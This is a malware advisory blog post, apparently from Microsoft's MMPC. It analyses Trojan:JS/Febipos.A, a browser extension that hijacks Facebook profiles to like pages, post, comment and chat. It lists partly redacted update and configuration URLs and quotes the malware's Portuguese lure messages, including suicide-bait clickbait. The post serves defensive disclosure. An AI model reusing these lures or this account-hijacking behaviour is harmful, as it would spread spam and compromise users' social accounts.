We have received reports about a wave of malicious browser extensions trying to hijack Facebook profiles. This threat was first discovered in Brazil. We detect it as Trojan:JS/Febipos.A. The malware is a malicious browser extension specifically targeting Chrome and Mozilla Firefox.
When installed, it attempts to update itself using the following URLs:
Chrome browser:
du-pont.info/updates/<removed>/BL-chromebrasil.crx
Mozilla Firefox browser:
du-pont.info/updates/<removed>/BL-mozillabrasil.xpi
Note: Updated versions of this threat have been verified and are still detected as Trojan:JS/Febipos.A.
To begin with, this Trojan monitors a user to see if they are currently logged-in to Facebook. It then attempts to get a configuration file from the website <removed>.info/sqlvarbr.php. The file includes a list of commands of what the browser extension will do.
Depending on the file, this malware can do any of the following in the Facebook profile of an infected system:
Like a page
Share
Post
Join a group
Invite friends to a group
Chat to friends
Comment on a post
At the time of writing this blog, we have also seen the following behavior.
The configuration file contains a command to post the following message in Facebook:
GAROTA DE 15 ANOS VÃTIMA DE BULLYING COMETE SUICÃDIO APÓS MOSTRAR OS SEIOS NO FACEBOOK
Vìdeo no link abaixo:<Currently unavailable link>
It is written in Portuguese and here’s an English translation:
15 YEAR-OLD VICTIM OF BULLYING COMMITS SUICIDE AFTER SHOWING HER BREASTS ON FACEBOOK.
Video on the link below: <Currently unavailable link>
The above URL is unavailable and already blocked by Facebook.
We also found this threat tries to "like" and "comment" on a Facebook page:
It also attempts to comment on a post from this Facebook page with one of the following messages, written in Portuguese:
Tenha um Celta 0km pagando R$13,00 por dia!!
English translation: Get a brand new Celta paying R$13 per day!!
Concurso valendo um Vale-Compras de R$1000,00!
English translation: R$1000-voucher contest!
Note: This message may vary depending on the configuration file.As we can see on the Facebook page, there’s a link that has been shared with about 165 comments and 167 likes. There is a possibility that these people are infected with Trojan:JS/Febipos.A.
This trojan may also send out the following message via chat, posts or comments:
Desculpa ai galera, mas isso eh um absurdo!!!
English translation: Sorry guys, but this is ridiculous!!!
Sonzinho sensação do momento. Muito show!!
English translation: The coolest tune at the moment. It’s really nice!
Léo Max e Renan - Rebolada de Gama (Clipe Oficial)
English translation: <song title> (Official Clip)
Eu, não tenho carro do ano, não tenho grana sobrando, mas chego junto e...♫♫
English translation: I don’t have a new car, I don’t have spare cash, but I get really close...
It may also post links on Facebook profiles. For example, the posted link from the Facebook page in the image above redirects to a website that sells cars.
At the time this blog was written, there were more users “liking” and “commenting” on the Facebook page that this malware uses – so there’s a possibility that there are more people continuing to be infected.
The number of “likes” for this page grew as we analyzed this malware. When we began analysis the page statistics looked like this:
Facebook page likes: 2,746
Facebook shared link likes: 167
Number of comments: 165
After several hours this had risen to:
Facebook page likes: 3,177
Facebook shared link likes: 201
Number of comments: 183
All of the information above is what we found at the time of our analysis. There may be more to this threat because it can change its messages, URLs, Facebook pages and other activity at any time. In any case, we recommend you always keep your security products updated with the latest definitions to help avoid infection.
Jonathan San Jose
MMPC